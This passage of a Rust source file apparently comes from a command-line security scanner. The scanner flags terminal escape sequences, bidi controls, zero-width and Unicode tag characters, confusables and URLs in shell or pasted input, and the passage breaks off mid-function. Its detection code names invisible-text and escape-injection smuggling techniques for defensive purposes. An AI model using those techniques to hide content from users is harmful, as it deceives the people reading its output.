1use once_cell::sync::Lazy;
2use regex::Regex;
3
4use crate::parse::{self, UrlLike};
5use crate::tokenize::{self, Segment, ShellType};
6
/// Where the scanned text came from; selects which tier-1 prefilter applies.
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub enum ScanContext {
    /// Text about to be executed as a command line.
    Exec,
    /// Text pasted into the terminal.
    Paste,
    /// Contents of a file being scanned (never filtered out by tier 1).
    FileScan,
}
18
// Build-script output: tier-1 regex patterns and the extractor id list are
// generated into OUT_DIR and spliced in here.
#[allow(dead_code)]
mod tier1_generated {
    include!(concat!(env!("OUT_DIR"), "/tier1_gen.rs"));
}
24
/// Identifiers of the generated tier-1 extractors, in generation order.
pub fn extractor_ids() -> &'static [&'static str] {
    tier1_generated::EXTRACTOR_IDS
}
29
/// Tier-1 prefilter for command-execution input (pattern is build-generated).
static TIER1_EXEC_REGEX: Lazy<Regex> = Lazy::new(|| {
    Regex::new(tier1_generated::TIER1_EXEC_PATTERN).expect("tier1 exec regex must compile")
});
34
/// Tier-1 prefilter for pasted input (pattern is build-generated).
static TIER1_PASTE_REGEX: Lazy<Regex> = Lazy::new(|| {
    Regex::new(tier1_generated::TIER1_PASTE_PATTERN).expect("tier1 paste regex must compile")
});
39
/// Matches explicit-scheme URLs (http/https/ftp/ssh/git) and scp-style
/// `user@host:path` references.
static URL_REGEX: Lazy<Regex> = Lazy::new(|| {
    Regex::new(
        r#"(?:(?:https?|ftp|ssh|git)://[^\s'"<>]+)|(?:[a-zA-Z0-9._-]+@[a-zA-Z0-9._-]+:[^\s'"<>]+)"#,
    )
    .expect("url regex must compile")
});
47
/// Summary of a byte-level scan: one flag per finding category plus the
/// individual findings that produced them.
pub struct ByteScanResult {
    /// ANSI/VT escape introducers (CSI/OSC/APC/DCS) or a trailing ESC byte.
    pub has_ansi_escapes: bool,
    /// C0 control bytes (other than LF/TAB/ESC and CRLF's CR) or DEL.
    pub has_control_chars: bool,
    /// Unicode bidirectional control characters.
    pub has_bidi_controls: bool,
    /// Zero-width characters (ZWSP, ZWNJ, ZWJ, soft hyphen, non-leading BOM, ...).
    pub has_zero_width: bool,
    /// The input as a whole is not valid UTF-8.
    pub has_invalid_utf8: bool,
    /// Characters from the Unicode tag block (U+E0000..=U+E007F).
    pub has_unicode_tags: bool,
    /// Variation selectors (U+FE00..=U+FE0F, U+E0100..=U+E01EF).
    pub has_variation_selectors: bool,
    /// Invisible math operators (U+2061..=U+2064).
    pub has_invisible_math_operators: bool,
    /// Typographic space characters that render like ordinary whitespace.
    pub has_invisible_whitespace: bool,
    /// Hangul filler characters usable as invisible letters.
    pub has_hangul_fillers: bool,
    /// Characters visually confusable with other text.
    pub has_confusable_text: bool,
    /// One entry per flagged byte/character, in input order.
    pub details: Vec<ByteFinding>,
}
63
/// A single flagged location in the scanned input.
pub struct ByteFinding {
    /// Byte offset of the finding in the input.
    pub offset: usize,
    /// The byte at `offset` (for multi-byte characters, the lead byte).
    pub byte: u8,
    /// Decoded code point, when the finding is a Unicode character.
    pub codepoint: Option<u32>,
    /// Human-readable category text; `with_ignored_range` re-derives the
    /// summary flags from this string.
    pub description: String,
}
71
72impl ByteScanResult {
73 pub fn with_ignored_range(mut self, ignore: &std::ops::Range<usize>) -> Self {
82 self.details.retain(|d| !ignore.contains(&d.offset));
83 self.has_ansi_escapes = false;
86 self.has_control_chars = false;
87 self.has_bidi_controls = false;
88 self.has_zero_width = false;
89 self.has_unicode_tags = false;
90 self.has_variation_selectors = false;
91 self.has_invisible_math_operators = false;
92 self.has_invisible_whitespace = false;
93 self.has_hangul_fillers = false;
94 self.has_confusable_text = false;
95 for d in &self.details {
96 let desc = d.description.as_str();
97 if desc.ends_with("escape sequence") || desc == "trailing escape byte" {
98 self.has_ansi_escapes = true;
99 } else if desc.starts_with("control character") {
100 self.has_control_chars = true;
101 } else if desc.starts_with("bidi control") {
102 self.has_bidi_controls = true;
103 } else if desc.starts_with("zero-width character") {
104 self.has_zero_width = true;
105 } else if desc.starts_with("unicode tag") {
106 self.has_unicode_tags = true;
107 } else if desc.starts_with("variation selector") {
108 self.has_variation_selectors = true;
109 } else if desc.starts_with("invisible math operator") {
110 self.has_invisible_math_operators = true;
111 } else if desc.starts_with("invisible whitespace") {
112 self.has_invisible_whitespace = true;
113 } else if desc.starts_with("hangul filler") {
114 self.has_hangul_fillers = true;
115 } else if desc.starts_with("confusable") || desc.starts_with("text confusable") {
116 self.has_confusable_text = true;
117 }
118 }
119 self
120 }
121}
122
123pub fn tier1_scan(input: &str, context: ScanContext) -> bool {
125 match context {
126 ScanContext::Exec => TIER1_EXEC_REGEX.is_match(input),
127 ScanContext::Paste => TIER1_PASTE_REGEX.is_match(input),
128 ScanContext::FileScan => true,
130 }
131}
132
/// Scans raw bytes for terminal-escape and Unicode smuggling primitives.
///
/// Records one [`ByteFinding`] per hit and sets the matching summary flag on
/// the returned [`ByteScanResult`]. The walk is byte-oriented so it still
/// works on input that is not valid UTF-8 (which itself sets
/// `has_invalid_utf8`).
pub fn scan_bytes(input: &[u8]) -> ByteScanResult {
    let mut result = ByteScanResult {
        has_ansi_escapes: false,
        has_control_chars: false,
        has_bidi_controls: false,
        has_zero_width: false,
        has_invalid_utf8: false,
        has_unicode_tags: false,
        has_variation_selectors: false,
        has_invisible_math_operators: false,
        has_invisible_whitespace: false,
        has_hangul_fillers: false,
        has_confusable_text: false,
        details: Vec::new(),
    };

    // Whole-input property; per-byte findings below are still collected on a
    // best-effort basis even when this is set.
    if std::str::from_utf8(input).is_err() {
        result.has_invalid_utf8 = true;
    }

    let len = input.len();
    let mut i = 0;
    while i < len {
        let b = input[i];

        // ESC (0x1b): flag the CSI/OSC/APC/DCS sequence introducers. A bare
        // ESC as the very last byte is flagged too; an ESC followed by any
        // other byte is left unflagged and handled as an ordinary byte.
        if b == 0x1b {
            if i + 1 < len {
                let next = input[i + 1];
                if next == b'[' || next == b']' || next == b'_' || next == b'P' {
                    result.has_ansi_escapes = true;
                    result.details.push(ByteFinding {
                        offset: i,
                        byte: b,
                        codepoint: None,
                        description: match next {
                            b'[' => "CSI escape sequence",
                            b']' => "OSC escape sequence",
                            b'_' => "APC escape sequence",
                            b'P' => "DCS escape sequence",
                            _ => "escape sequence",
                        }
                        .to_string(),
                    });
                    // Skip the introducer pair and restart the loop.
                    i += 2;
                    continue;
                }
            } else {
                result.has_ansi_escapes = true;
                result.details.push(ByteFinding {
                    offset: i,
                    byte: b,
                    codepoint: None,
                    description: "trailing escape byte".to_string(),
                });
            }
        }

        // Bare CR (not part of a CRLF pair) can visually overwrite previously
        // displayed text, so only that form is treated as suspicious.
        if b == b'\r' {
            let is_attack_cr = i + 1 < len && input[i + 1] != b'\n';
            if is_attack_cr {
                result.has_control_chars = true;
                result.details.push(ByteFinding {
                    offset: i,
                    byte: b,
                    codepoint: None,
                    description: format!("control character 0x{b:02x}"),
                });
            }
        } else if b < 0x20 && b != b'\n' && b != b'\t' && b != 0x1b {
            // Remaining C0 controls; LF/TAB are benign and ESC was handled
            // above.
            result.has_control_chars = true;
            result.details.push(ByteFinding {
                offset: i,
                byte: b,
                codepoint: None,
                description: format!("control character 0x{b:02x}"),
            });
        }

        // DEL is outside the C0 range and gets its own check.
        if b == 0x7F {
            result.has_control_chars = true;
            result.details.push(ByteFinding {
                offset: i,
                byte: b,
                codepoint: None,
                description: "control character 0x7f (DEL)".to_string(),
            });
        }

        // Possible UTF-8 lead byte: try to decode one character so the
        // Unicode-category checks below can run. First attempt the whole
        // remainder; if later bytes are invalid, retry on just the first
        // (up to) 4 bytes.
        // NOTE(review): the fallback only succeeds when those min(len, 4)
        // bytes form a *complete* valid UTF-8 string, so a valid char followed
        // by garbage inside that window may still go undecoded — confirm this
        // is acceptable.
        if b >= 0xc0 {
            let remaining = &input[i..];
            if let Some(ch) = std::str::from_utf8(remaining)
                .ok()
                .or_else(|| std::str::from_utf8(&remaining[..remaining.len().min(4)]).ok())
                .and_then(|s| s.chars().next())
            {
                if is_bidi_control(ch) {
                    result.has_bidi_controls = true;
                    result.details.push(ByteFinding {
                        offset: i,
                        byte: b,
                        codepoint: Some(ch as u32),
                        description: format!("bidi control U+{:04X}", ch as u32),
                    });
                }
                // A BOM (U+FEFF) at offset 0 is a legitimate byte-order mark,
                // not a smuggled zero-width character.
                if is_zero_width(ch) && !(ch == '\u{FEFF}' && i == 0) {
                    result.has_zero_width = true;
                    result.details.push(ByteFinding {
                        offset: i,
                        byte: b,
                        codepoint: Some(ch as u32),
                        description: format!("zero-width character U+{:04X}", ch as u32),
                    });
                }
                if is_unicode_tag(ch) {
                    result.has_unicode_tags = true;
                    result.details.push(ByteFinding {
                        offset: i,
                        byte: b,
                        codepoint: Some(ch as u32),
                        description: format!("unicode tag U+{:04X}", ch as u32),
                    });
                }
                if is_variation_selector(ch) {
                    result.has_variation_selectors = true;
                    result.details.push(ByteFinding {
                        offset: i,
                        byte: b,
                        codepoint: Some(ch as u32),
                        description: format!("variation selector U+{:04X}", ch as u32),
                    });
                }
                if is_invisible_math_operator(ch) {
                    result.has_invisible_math_operators = true;
                    result.details.push(ByteFinding {
                        offset: i,
                        byte: b,
                        codepoint: Some(ch as u32),
                        description: format!("invisible math operator U+{:04X}", ch as u32),
                    });
                }
                if is_invisible_whitespace(ch) {
                    result.has_invisible_whitespace = true;
                    result.details.push(ByteFinding {
                        offset: i,
                        byte: b,
                        codepoint: Some(ch as u32),
                        description: format!("invisible whitespace U+{:04X}", ch as u32),
                    });
                }
                if is_hangul_filler(ch) {
                    result.has_hangul_fillers = true;
                    result.details.push(ByteFinding {
                        offset: i,
                        byte: b,
                        codepoint: Some(ch as u32),
                        description: format!("hangul filler U+{:04X}", ch as u32),
                    });
                }
                // Text-confusable table takes precedence over the general
                // confusable table; at most one finding per character.
                if let Some(target) = crate::text_confusables::is_text_confusable(ch) {
                    result.has_confusable_text = true;
                    result.details.push(ByteFinding {
                        offset: i,
                        byte: b,
                        codepoint: Some(ch as u32),
                        description: format!(
                            "text confusable U+{:04X} (looks like '{target}')",
                            ch as u32
                        ),
                    });
                } else if let Some(target) = crate::confusables::is_confusable(ch) {
                    result.has_confusable_text = true;
                    result.details.push(ByteFinding {
                        offset: i,
                        byte: b,
                        codepoint: Some(ch as u32),
                        description: format!(
                            "confusable U+{:04X} (looks like '{target}')",
                            ch as u32
                        ),
                    });
                }
                // Advance over the full character we just decoded.
                i += ch.len_utf8();
                continue;
            }
        }

        i += 1;
    }

    result
}
340
/// True for Unicode bidirectional controls: LRM/RLM, the LRE/RLE/PDF/LRO/RLO
/// embedding block, and the LRI/RLI/FSI/PDI isolate block.
fn is_bidi_control(ch: char) -> bool {
    let cp = ch as u32;
    cp == 0x200E
        || cp == 0x200F
        || (0x202A..=0x202E).contains(&cp)
        || (0x2066..=0x2069).contains(&cp)
}
358
/// True for characters that occupy no horizontal space: soft hyphen,
/// combining grapheme joiner, Mongolian vowel separator, ZWSP/ZWNJ/ZWJ,
/// word joiner, and BOM/ZWNBSP.
fn is_zero_width(ch: char) -> bool {
    const ZERO_WIDTH: [char; 8] = [
        '\u{00AD}', '\u{034F}', '\u{180E}', '\u{200B}', '\u{200C}', '\u{200D}', '\u{2060}',
        '\u{FEFF}',
    ];
    ZERO_WIDTH.contains(&ch)
}
373
/// True for the Unicode tag block (U+E0000..=U+E007F), usable to smuggle
/// invisible ASCII-shadow text.
fn is_unicode_tag(ch: char) -> bool {
    matches!(ch as u32, 0xE0000..=0xE007F)
}
378
/// True for variation selectors: VS1-VS16 (U+FE00..=U+FE0F) and the
/// supplementary VS17-VS256 block (U+E0100..=U+E01EF).
fn is_variation_selector(ch: char) -> bool {
    matches!(ch as u32, 0xFE00..=0xFE0F | 0xE0100..=0xE01EF)
}
383
/// True for Hangul filler characters (U+3164, U+115F, U+1160), which render
/// as blank but count as letters.
fn is_hangul_filler(ch: char) -> bool {
    ch == '\u{3164}' || ch == '\u{115F}' || ch == '\u{1160}'
}
393
/// True for the invisible math operators U+2061..=U+2064 (function
/// application, invisible times/separator/plus).
fn is_invisible_math_operator(ch: char) -> bool {
    matches!(ch, '\u{2061}' | '\u{2062}' | '\u{2063}' | '\u{2064}')
}
399
/// True for typographic space characters (en/em quads and friends,
/// U+2000..=U+200A, plus the medium mathematical space U+205F) that render
/// like an ordinary space.
fn is_invisible_whitespace(ch: char) -> bool {
    let cp = ch as u32;
    (0x2000..=0x200A).contains(&cp) || cp == 0x205F
}
421
/// Tokenizes `input` for the given shell and extracts every URL-like token:
/// explicit URLs, proxy-free env-assignment values, schemeless hosts in sink
/// contexts, and docker/podman/nerdctl image references.
pub fn extract_urls(input: &str, shell: ShellType) -> Vec<ExtractedUrl> {
    let segments = tokenize::tokenize(input, shell);
    let mut results = Vec::new();

    for (seg_idx, segment) in segments.iter().enumerate() {
        let sink_context = is_sink_context(segment, &segments);
        let resolved = resolve_segment_command(segment);

        // For the first segment only: if it resolves to a `tirith` inspection
        // subcommand (diff/score/...), arguments from that subcommand onward
        // are inert and must not be scanned for URLs. The value is the arg
        // index to stop at.
        let inspection_skip_args_from: Option<usize> = if seg_idx == 0 {
            resolved.as_ref().and_then(|cmd| {
                if cmd.name != "tirith" {
                    return None;
                }
                // Find where tirith's own args start: either the segment
                // command IS tirith, or tirith appears after a wrapper
                // (sudo/env/...) in the arg list.
                let start_from: usize =
                    if segment.command.as_deref().map(command_base_name).as_deref()
                        == Some("tirith")
                    {
                        0
                    } else if let Some(at) = segment
                        .args
                        .iter()
                        .position(|a| command_base_name(a) == "tirith")
                    {
                        at + 1
                    } else {
                        return None;
                    };
                // Skip tirith's leading flags to reach the subcommand word.
                let mut i = start_from;
                while i < segment.args.len() {
                    let clean = strip_quotes(&segment.args[i]);
                    if clean.starts_with('-') {
                        i += 1;
                        continue;
                    }
                    break;
                }
                let sub_arg = segment.args.get(i)?;
                if is_tirith_inspection_subcommand(&command_base_name(sub_arg)) {
                    Some(i)
                } else {
                    None
                }
            })
        } else {
            None
        };

        // Strings that may contain explicit URLs: the command word itself and
        // its arguments (truncated at the inert tirith range, if any).
        let mut url_sources: Vec<&str> = Vec::new();
        if let Some(ref cmd) = segment.command {
            url_sources.push(cmd.as_str());
        }
        for (arg_idx, arg) in segment.args.iter().enumerate() {
            if let Some(skip_from) = inspection_skip_args_from {
                if arg_idx >= skip_from {
                    break;
                }
            }
            url_sources.push(arg.as_str());
        }
        // Leading VAR=value assignments can carry URLs too — except proxy
        // variables, whose values legitimately hold URLs.
        for (name, value) in tokenize::leading_env_assignments(&segment.raw) {
            if ignores_env_assignment_url(&name) {
                continue;
            }
            let clean = strip_quotes(&value);
            if !clean.is_empty() {
                push_urls_from_source(&clean, seg_idx, sink_context, &mut results);
            }
        }
        for source in &url_sources {
            push_urls_from_source(source, seg_idx, sink_context, &mut results);
        }

        // In sink context, also pick up schemeless hosts ("example.com/x").
        // Docker-family commands are excluded here; their image references
        // are handled by the dedicated block below.
        let is_docker_cmd = resolved
            .as_ref()
            .is_some_and(|cmd| matches!(cmd.name.as_str(), "docker" | "podman" | "nerdctl"));
        if sink_context && !is_docker_cmd {
            if let Some(cmd) = resolved.as_ref() {
                let is_remote_copy = matches!(cmd.name.as_str(), "scp" | "rsync");
                for (arg_idx, arg) in cmd.args.iter().enumerate() {
                    // Values of output/credential flags are not URLs.
                    if is_output_flag_value(&cmd.name, cmd.args, arg_idx) {
                        continue;
                    }
                    let clean = strip_quotes(arg);
                    if is_remote_copy {
                        // NOTE(review): the parse result is discarded — remote
                        // copy specs seem to be recognized only so they are
                        // not treated as schemeless hosts; confirm intent.
                        let _ = parse_scp_remote_spec(&clean, shell);
                        continue;
                    }
                    if looks_like_schemeless_host(&clean) && !URL_REGEX.is_match(&clean) {
                        results.push(ExtractedUrl {
                            raw: clean.clone(),
                            parsed: UrlLike::SchemelessHostPath {
                                host: extract_host_from_schemeless(&clean),
                                path: extract_path_from_schemeless(&clean),
                            },
                            segment_index: seg_idx,
                            in_sink_context: true,
                        });
                    }
                }
            }
        }

        // Docker-family commands: image references are URL-like sinks.
        if let Some(cmd) = resolved.as_ref() {
            if matches!(cmd.name.as_str(), "docker" | "podman" | "nerdctl") {
                if let Some(docker_subcmd) = cmd.args.first() {
                    let subcmd_lower = docker_subcmd.to_lowercase();
                    if subcmd_lower == "build" {
                        // `build` names images via -t/--tag in all three
                        // spellings: separate value, glued (-tNAME), --tag=NAME.
                        let mut i = 1;
                        while i < cmd.args.len() {
                            let arg = strip_quotes(&cmd.args[i]);
                            if (arg == "-t" || arg == "--tag") && i + 1 < cmd.args.len() {
                                let tag_val = strip_quotes(&cmd.args[i + 1]);
                                if !tag_val.is_empty() {
                                    let docker_url = parse::parse_docker_ref(&tag_val);
                                    results.push(ExtractedUrl {
                                        raw: tag_val,
                                        parsed: docker_url,
                                        segment_index: seg_idx,
                                        in_sink_context: true,
                                    });
                                }
                                i += 2;
                            } else if arg.starts_with("-t") && arg.len() > 2 {
                                let tag_val = strip_quotes(&arg[2..]);
                                let docker_url = parse::parse_docker_ref(&tag_val);
                                results.push(ExtractedUrl {
                                    raw: tag_val,
                                    parsed: docker_url,
                                    segment_index: seg_idx,
                                    in_sink_context: true,
                                });
                                i += 1;
                            } else if let Some(val) = arg.strip_prefix("--tag=") {
                                let tag_val = strip_quotes(val);
                                let docker_url = parse::parse_docker_ref(&tag_val);
                                results.push(ExtractedUrl {
                                    raw: tag_val,
                                    parsed: docker_url,
                                    segment_index: seg_idx,
                                    in_sink_context: true,
                                });
                                i += 1;
                            } else {
                                i += 1;
                            }
                        }
                    } else if subcmd_lower == "image" {
                        // `docker image pull/push/... IMAGE` — image ref is
                        // the first positional after the nested subcommand.
                        if let Some(image_subcmd) = cmd.args.get(1) {
                            let image_subcmd_lower = image_subcmd.to_lowercase();
                            if matches!(
                                image_subcmd_lower.as_str(),
                                "pull" | "push" | "inspect" | "rm" | "tag"
                            ) {
                                extract_first_docker_image(&cmd.args[2..], seg_idx, &mut results);
                            }
                        }
                    } else if matches!(subcmd_lower.as_str(), "pull" | "run" | "create") {
                        extract_first_docker_image(&cmd.args[1..], seg_idx, &mut results);
                    }
                }
            }
        }
    }

    results
}
623
/// A URL-like token found in the scanned command line.
#[derive(Debug, Clone)]
pub struct ExtractedUrl {
    /// The matched text exactly as it appeared.
    pub raw: String,
    /// Structured interpretation of `raw`.
    pub parsed: UrlLike,
    /// Index of the shell segment the URL was found in.
    pub segment_index: usize,
    /// True when the segment's command consumes URLs (downloader, VCS, ...).
    pub in_sink_context: bool,
}
632
/// docker/podman/nerdctl flags whose value is the NEXT argument; used when
/// searching for the first positional (image) argument.
const DOCKER_VALUE_FLAGS: &[&str] = &[
    "--platform",
    "--format",
    "--filter",
    "-f",
    "--label",
    "-l",
    "--name",
    "--hostname",
    "--user",
    "-u",
    "--workdir",
    "-w",
    "--network",
    "--net",
    "--env",
    "-e",
    "--env-file",
    "--publish",
    "-p",
    "--expose",
    "--volume",
    "-v",
    "--mount",
    "--add-host",
    "--device",
    "--entrypoint",
    "--log-driver",
    "--log-opt",
    "--restart",
    "--runtime",
    "--cpus",
    "--cpu-shares",
    "--cpu-quota",
    "--memory",
    "--memory-reservation",
    "--memory-swap",
    "--shm-size",
    "--ulimit",
    "--security-opt",
    "--sysctl",
    "--tmpfs",
    "--gpus",
    "--ipc",
    "--pid",
    "--userns",
    "--cgroupns",
];

/// Short flags that may be glued directly to their value (`-p8080:80`,
/// `-eKEY=VAL`, ...).
const DOCKER_VALUE_PREFIXES: &[&str] = &["-p", "-e", "-v", "-l", "-u", "-w"];
685
/// Pushes the first positional (image-looking) argument of a docker-style
/// command as a sink-context [`ExtractedUrl`], honoring `--`, value-consuming
/// flags, and inline `--flag=value` forms.
fn extract_first_docker_image(args: &[String], seg_idx: usize, results: &mut Vec<ExtractedUrl>) {
    let mut skip_next = false;
    let mut end_of_options = false;
    for arg in args {
        if skip_next {
            // This token is the value of the preceding flag, not the image.
            skip_next = false;
            continue;
        }
        let clean = strip_quotes(arg);
        if clean == "--" {
            end_of_options = true;
            continue;
        }
        if !end_of_options && clean.starts_with("--") && clean.contains('=') {
            // `--flag=value` carries its value inline; skip the whole token.
            continue;
        }
        if !end_of_options && clean.starts_with('-') {
            if DOCKER_VALUE_FLAGS.iter().any(|f| clean == *f) {
                skip_next = true;
            }
            // NOTE(review): this prefix check is redundant — the branch falls
            // through to the same `continue` below whether or not it matches.
            if DOCKER_VALUE_PREFIXES
                .iter()
                .any(|p| clean.starts_with(p) && clean.len() > p.len())
            {
                continue;
            }
            continue;
        }
        // First positional: record it unless it is clearly a URL, a build
        // context path (`.`/`..`), or stdin (`-`); then stop either way.
        if !clean.contains("://") && clean != "." && clean != ".." && clean != "-" {
            let docker_url = parse::parse_docker_ref(&clean);
            results.push(ExtractedUrl {
                raw: clean,
                parsed: docker_url,
                segment_index: seg_idx,
                in_sink_context: true,
            });
        }
        break;
    }
}
729
/// A command after unwrapping known wrappers (`sudo`, `env`, `command`,
/// `time`, `tirith`): the effective name plus the arguments that follow it.
#[derive(Debug, Clone)]
struct ResolvedCommand<'a> {
    // Lowercased base name of the effective command.
    name: String,
    // Arguments following the effective command word.
    args: &'a [String],
}
735
736fn push_urls_from_source(
737 source: &str,
738 segment_index: usize,
739 in_sink_context: bool,
740 results: &mut Vec<ExtractedUrl>,
741) {
742 for mat in URL_REGEX.find_iter(source) {
743 let raw = mat.as_str().to_string();
744 let url = parse::parse_url(&raw);
745 results.push(ExtractedUrl {
746 raw,
747 parsed: url,
748 segment_index,
749 in_sink_context,
750 });
751 }
752}
753
/// True for environment variables whose values legitimately contain URLs and
/// should not be scanned: proxy configuration such as `HTTP_PROXY`,
/// `https_proxy`, `NO_PROXY`.
fn ignores_env_assignment_url(name: &str) -> bool {
    // "NO_PROXY" itself ends with "_PROXY", so one suffix check covers every
    // case the previous explicit equality clause did.
    name.to_ascii_uppercase().ends_with("_PROXY")
}
758
/// Long `env(1)` options that consume a separate value argument (when not
/// written in `--flag=value` form).
fn env_long_flag_takes_value(flag: &str) -> bool {
    let name = match flag.split_once('=') {
        Some((head, _)) => head,
        None => flag,
    };
    name == "--unset" || name == "--chdir" || name == "--split-string"
}
763
764fn command_base_name(raw: &str) -> String {
765 let clean = strip_quotes(raw);
766 clean
767 .rsplit(['/', '\\'])
768 .next()
769 .unwrap_or(clean.as_str())
770 .to_lowercase()
771}
772
/// Resolves a segment's command word through known wrappers to the effective
/// command, or `None` when the segment has no command.
fn resolve_segment_command(segment: &Segment) -> Option<ResolvedCommand<'_>> {
    let command = segment.command.as_ref()?;
    resolve_named_command(command, &segment.args)
}
777
/// Public wrapper around the internal resolver returning owned data: the
/// effective command name and its arguments after unwrapping wrappers.
pub fn resolve_wrapped_command(segment: &Segment) -> Option<(String, Vec<String>)> {
    let resolved = resolve_segment_command(segment)?;
    Some((resolved.name, resolved.args.to_vec()))
}
790
/// Resolves a command word to the effective command, recursively unwrapping
/// the known wrappers (`env`, `command`, `time`, `sudo`/`doas`) and
/// special-casing `tirith` subcommands.
fn resolve_named_command<'a>(command: &str, args: &'a [String]) -> Option<ResolvedCommand<'a>> {
    let name = command_base_name(command);
    match name.as_str() {
        "env" => resolve_env_command(args),
        "command" => resolve_command_wrapper(args),
        "time" => resolve_time_wrapper(args),
        "sudo" | "doas" => resolve_sudo_wrapper(args),
        "tirith" => resolve_tirith_command(args),
        _ => Some(ResolvedCommand { name, args }),
    }
}
802
/// Unwraps a `sudo`/`doas` invocation to the wrapped command: skips option
/// flags (including value-consuming ones), leading VAR=value assignments,
/// and an optional `--`, then resolves the first remaining word recursively.
fn resolve_sudo_wrapper(args: &[String]) -> Option<ResolvedCommand<'_>> {
    // Short flags whose value is the next argument (e.g. `sudo -u root cmd`).
    const SUDO_VALUE_FLAGS: &[&str] = &["-u", "-g", "-p", "-C", "-D", "-U", "-r", "-t"];
    // Long flags that consume the next argument when not written `--flag=value`.
    const SUDO_LONG_VALUE_FLAGS: &[&str] = &[
        "--user",
        "--group",
        "--prompt",
        "--close-from",
        "--chdir",
        "--other-user",
        "--role",
        "--type",
        "--host",
    ];

    let mut i = 0;
    let mut after_dashdash = false;
    while i < args.len() {
        let clean = strip_quotes(&args[i]);
        if !after_dashdash && clean == "--" {
            after_dashdash = true;
            i += 1;
            continue;
        }
        // `sudo VAR=value cmd` — skip the assignment.
        if !after_dashdash && tokenize::is_env_assignment(&clean) {
            i += 1;
            continue;
        }
        if !after_dashdash && clean.starts_with("--") {
            let name_part = clean.split_once('=').map(|(n, _)| n).unwrap_or(&clean);
            // A separate-value long flag skips its value too.
            if !clean.contains('=') && SUDO_LONG_VALUE_FLAGS.contains(&name_part) {
                i += 2;
            } else {
                i += 1;
            }
            continue;
        }
        if !after_dashdash && clean.starts_with('-') {
            if SUDO_VALUE_FLAGS.contains(&clean.as_str()) {
                i += 2;
                continue;
            }
            i += 1;
            continue;
        }
        // First non-flag word: resolve recursively (handles `sudo env ...`).
        return resolve_named_command(&clean, &args[i + 1..]);
    }
    None
}
871
/// Unwraps `env [flags] [VAR=value ...] CMD ...` to the wrapped command.
/// `-u`/`-C`/`-S` and value-taking long flags consume the next argument;
/// `--` ends option parsing (assignments may still precede the command).
fn resolve_env_command(args: &[String]) -> Option<ResolvedCommand<'_>> {
    let mut i = 0;
    while i < args.len() {
        let clean = strip_quotes(&args[i]);
        if clean == "--" {
            i += 1;
            break;
        }
        if tokenize::is_env_assignment(&clean) {
            i += 1;
            continue;
        }
        if clean.starts_with('-') {
            if clean.starts_with("--") {
                // `--flag value` consumes two tokens, `--flag=value` one.
                if env_long_flag_takes_value(&clean) && !clean.contains('=') {
                    i += 2;
                } else {
                    i += 1;
                }
                continue;
            }
            if clean == "-u" || clean == "-C" || clean == "-S" {
                i += 2;
                continue;
            }
            i += 1;
            continue;
        }
        return resolve_named_command(&clean, &args[i + 1..]);
    }

    // After `--`: only VAR=value assignments may still precede the command.
    while i < args.len() {
        let clean = strip_quotes(&args[i]);
        if tokenize::is_env_assignment(&clean) {
            i += 1;
            continue;
        }
        return resolve_named_command(&clean, &args[i + 1..]);
    }

    None
}
914
915fn resolve_command_wrapper(args: &[String]) -> Option<ResolvedCommand<'_>> {
916 let mut i = 0;
917 while i < args.len() {
918 let clean = strip_quotes(&args[i]);
919 if clean == "--" {
920 i += 1;
921 break;
922 }
923 if clean.starts_with('-') {
924 i += 1;
925 continue;
926 }
927 break;
928 }
929 args.get(i)
930 .and_then(|arg| resolve_named_command(arg, &args[i + 1..]))
931}
932
933fn resolve_time_wrapper(args: &[String]) -> Option<ResolvedCommand<'_>> {
934 let mut i = 0;
935 while i < args.len() {
936 let clean = strip_quotes(&args[i]);
937 if clean == "--" {
938 i += 1;
939 break;
940 }
941 if clean.starts_with('-') {
942 if clean == "-f" || clean == "--format" || clean == "-o" || clean == "--output" {
943 i += 2;
944 } else {
945 i += 1;
946 }
947 continue;
948 }
949 break;
950 }
951 args.get(i)
952 .and_then(|arg| resolve_named_command(arg, &args[i + 1..]))
953}
954
955fn resolve_tirith_command(args: &[String]) -> Option<ResolvedCommand<'_>> {
956 let subcommand = args.first().map(|arg| command_base_name(arg))?;
957 match subcommand.as_str() {
958 "run" => Some(ResolvedCommand {
959 name: "tirith-run".to_string(),
960 args: &args[1..],
961 }),
962 _ => Some(ResolvedCommand {
963 name: "tirith".to_string(),
964 args,
965 }),
966 }
967}
968
/// `tirith` subcommands whose trailing arguments are inert (inspection only)
/// and therefore exempt from URL extraction.
fn is_tirith_inspection_subcommand(sub: &str) -> bool {
    const INSPECTION: &[&str] = &["diff", "score", "why", "receipt", "explain"];
    INSPECTION.contains(&sub)
}
980
/// If `input` starts with a `tirith` inspection subcommand (`diff`, `score`,
/// ...), returns the input byte range of everything after that subcommand
/// token in the first segment. Those bytes are "inert" — inspected, never
/// executed — so downstream scanners can ignore findings inside the range.
pub fn tirith_inert_arg_range(input: &str, shell: ShellType) -> Option<std::ops::Range<usize>> {
    let segments = tokenize::tokenize(input, shell);
    let first = segments.first()?;

    let resolved = resolve_segment_command(first)?;
    if resolved.name != "tirith" {
        return None;
    }

    // Skip tirith's leading flags to find the subcommand word.
    let mut sub_idx = 0;
    while sub_idx < resolved.args.len() {
        let clean = strip_quotes(&resolved.args[sub_idx]);
        if clean.starts_with('-') {
            sub_idx += 1;
            continue;
        }
        break;
    }
    let sub_arg = resolved.args.get(sub_idx)?;
    let subcommand = command_base_name(sub_arg);
    if !is_tirith_inspection_subcommand(&subcommand) {
        return None;
    }

    // Locate the subcommand token inside the segment's raw text so the range
    // can be expressed in byte offsets of the full input.
    let seg_slice = input.get(first.byte_range.clone())?;
    let sub_rel = find_subcommand_token(seg_slice, sub_arg.as_str())?;
    let inert_start = first.byte_range.start + sub_rel + sub_arg.len();
    let inert_end = first.byte_range.end;
    if inert_start >= inert_end {
        return None;
    }
    Some(inert_start..inert_end)
}
1040
/// Finds `needle` in `haystack` as a whitespace-delimited token and returns
/// its byte offset.
///
/// Fixes a UTF-8 boundary bug in the previous scan: after rejecting a
/// candidate it resumed at `abs + 1`, which can land inside a multi-byte
/// character; the subsequent `haystack.get(..)` then returned `None` and
/// aborted the whole search even when a later valid match existed.
fn find_subcommand_token(haystack: &str, needle: &str) -> Option<usize> {
    if needle.is_empty() {
        // An empty needle could only "match" a zero-width position; callers
        // always pass a real token, so treat it as absent.
        return None;
    }
    let bytes = haystack.as_bytes();
    let n = needle.len();
    let mut search_from = 0;
    // Invariant: `search_from` always sits on a char boundary, so slicing is
    // safe.
    while let Some(rel) = haystack[search_from..].find(needle) {
        let abs = search_from + rel;
        // Continuation bytes are >= 0x80 and never ASCII whitespace, so a
        // plain byte check is safe here.
